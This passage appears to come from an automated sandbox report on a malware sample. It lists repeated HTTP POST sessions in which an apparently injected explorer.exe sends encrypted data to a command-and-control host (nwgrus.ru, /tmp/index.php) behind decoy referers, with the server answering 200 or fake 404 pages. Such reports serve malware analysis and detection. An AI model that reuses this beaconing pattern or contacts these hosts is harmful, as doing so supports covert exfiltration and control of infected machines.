72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49917	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:47.828154087 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tqcdafuvgwwyn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: nwgrus.ru
Oct 14, 2024 06:02:47.828191996 CEST	230	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 40 09 de fa Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu@ Xkpd,rH@ob83`0}A64(T_{{>kK%Q,Js]WMYR}]0.B&w[
Oct 14, 2024 06:02:49.335956097 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:49 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49928	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:49.344197035 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dujexgghfqd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: nwgrus.ru
Oct 14, 2024 06:02:49.344212055 CEST	353	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 61 1d f1 e7 Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vuaU]V`gSm!c`NoIL CW]?-Pv42itA3)Dqp.B\-m"4\ ,3CGc4Cb
Oct 14, 2024 06:02:50.857863903 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:50 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49939	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:50.866394997 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qhntbwctbsxu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: nwgrus.ru
Oct 14, 2024 06:02:50.866425037 CEST	341	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 30 06 a8 e4 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu0b[AZ!7f29,lGmpSmY1>%6IVl,R;{x;FKu7tKE~YyOhVqY;,?%
Oct 14, 2024 06:02:52.382548094 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49949	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:52.391983032 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://numxyybjlxnij.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 190 Host: nwgrus.ru
Oct 14, 2024 06:02:52.392024040 CEST	190	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 4a 18 df e0 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuJ>sgliFLJ?M?UAW_@9Z[[CcI(LJQQEa_
Oct 14, 2024 06:02:53.929398060 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49960	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:53.950583935 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qxvvlpafyplsfmh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: nwgrus.ru
Oct 14, 2024 06:02:53.950615883 CEST	247	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 6e 5b da f5 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vun[%lQrey'P_r,CLVjYzTVszUWAY7%cc:EV9T/;7s/9abVQ@O]cARs
Oct 14, 2024 06:02:55.571316004 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:55 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49972	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:55.580125093 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://agcejdimcyykepgs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 195 Host: nwgrus.ru
Oct 14, 2024 06:02:55.580125093 CEST	195	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 33 00 cf e9 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu3MSkc]2~b>O`Tkxl\ZG269O^XG$l\^"G)
Oct 14, 2024 06:02:57.199507952 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49983	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:57.208039999 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sbsqbgjbfyr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 196 Host: nwgrus.ru
Oct 14, 2024 06:02:57.208080053 CEST	196	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 3b 5a cf fd Data Ascii: ;n"Sp{{jE^e$j?!0jHYcM@NA -[k,vu;Z^(ff^!-,usJiiQ0?D,h\Et1*+1]h1U/Y}t%
Oct 14, 2024 06:02:58.792424917 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49994	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:58.800740957 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kqejwgffiikyio.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: nwgrus.ru
Oct 14, 2024 06:02:58.800764084 CEST	310	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 5c 18 bf e4 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu\LVrij^$dtaH\4,n-"^_2VPG'iHBJc"H0&i/E!,/xDy2Vp((%y
Oct 14, 2024 06:03:00.281709909 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49996	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:00.430532932 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://evinpfxalwnnmcek.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: nwgrus.ru
Oct 14, 2024 06:03:00.430532932 CEST	213	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 4b 37 fc 9a Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuK7H3^QW& z$y{)S3}{[. >7=hc7P,K<b!8\|Im/FDH
Oct 14, 2024 06:03:02.013729095 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49997	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:02.021666050 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vsgvwtqctrqw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: nwgrus.ru
Oct 14, 2024 06:03:02.021719933 CEST	117	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 60 55 b0 e0 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu`U/rDUWHR~vqxq
Oct 14, 2024 06:03:03.632520914 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:03 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49999	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:03.640562057 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://aspcynlesjwhi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 250 Host: nwgrus.ru
Oct 14, 2024 06:03:03.640578985 CEST	250	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 35 1d fc 93 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu5]zus/k?KS9B,p>3&?'<GqAWgzQf?9[nR^J;Cl9jOYC7A!@
Oct 14, 2024 06:03:05.159991026 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:03:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50001	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:03:05.173413038 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jkejxmgpctomkc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 251 Host: nwgrus.ru
